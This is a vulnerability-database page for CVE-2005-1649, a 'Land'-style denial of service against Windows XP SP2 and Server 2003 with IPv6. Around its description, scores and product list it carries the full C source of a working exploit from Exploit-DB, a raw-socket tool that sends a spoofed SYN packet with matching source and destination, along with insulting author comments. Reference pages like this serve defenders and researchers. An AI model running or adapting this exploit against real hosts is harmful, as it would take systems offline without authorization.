CVE-2005-1649 : Detail

CVE-2005-1649

13.33%V4
Network
2005-05-18
02h00 +00:00
2005-05-25
07h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the "Land" vulnerability (CVE-1999-0016).

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 861

Publication date : 2005-03-06 23h00 +00:00
Author : RusH
EDB Verified : Yes

/* Added Line #1 - BSD_SOURCE!!!! /str0ke */ #define _BSD_SOURCE #include <stdio.h> #include <ctype.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <sysexits.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> /* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy All rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tcph; int mysock; u_char * packet; u_char * pseudopacket; int on = 1; if( argc != 3) { fprintf(stderr, "r57windos.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]); return EX_USAGE; } if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } inet_aton(argv[1], &src); inet_aton(argv[1], &dst); iph = (struct ip *) packet; iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_tos = 0; iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); iph->ip_off = htons(IP_DF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; iph->ip_sum = 0; iph->ip_src = src; iph->ip_dst = dst; tcph = (struct tcphdr *)(packet +sizeof(struct ip)); tcph->th_sport = htons(atoi(argv[2])); tcph->th_dport = htons(atoi(argv[2])); tcph->th_seq = ntohl(rand()); tcph->th_ack = rand(); tcph->th_off = 5; tcph->th_flags = TH_SYN; // setting up TCP SYN flag here tcph->th_win = htons(512); tcph->th_sum = 0; tcph->th_urp = 0; pseudoheader.source_addr = src; pseudoheader.destination_addr = dst; pseudoheader.zero = 0; pseudoheader.protocol = IPPROTO_TCP; pseudoheader.length = htons(sizeof(struct tcphdr)); if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(!mysock) { perror("socket!\n"); return EX_OSERR; } if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt"); shutdown(mysock, 2); return EX_OSERR; } sin.sin_family = PF_INET; sin.sin_addr = dst; sin.sin_port = htons(80); if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("sendto()\n"); shutdown(mysock, 2); return EX_OSERR; } printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; } // milw0rm.com [2005-03-07]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2003_server >> Version datacenter_64-bit

    Microsoft>>Windows_2003_server >> Version enterprise

      Microsoft>>Windows_2003_server >> Version enterprise

        Microsoft>>Windows_2003_server >> Version enterprise_64-bit

          Microsoft>>Windows_2003_server >> Version enterprise_64-bit

            Microsoft>>Windows_2003_server >> Version r2

              Microsoft>>Windows_2003_server >> Version r2

                Microsoft>>Windows_2003_server >> Version r2

                  Microsoft>>Windows_2003_server >> Version standard

                    Microsoft>>Windows_2003_server >> Version standard

                      Microsoft>>Windows_2003_server >> Version web

                        Microsoft>>Windows_2003_server >> Version web

                          Microsoft>>Windows_xp >> Version *

                            Microsoft>>Windows_xp >> Version *

                            Microsoft>>Windows_xp >> Version *

                            Microsoft>>Windows_xp >> Version *

                            Microsoft>>Windows_xp >> Version *

                            Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              Microsoft>>Windows_xp >> Version *

                              References

                              http://www.vupen.com/english/advisories/2005/0559
                              Tags : vdb-entry, x_refsource_VUPEN
                              http://www.securityfocus.com/bid/13658
                              Tags : vdb-entry, x_refsource_BID
                              The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.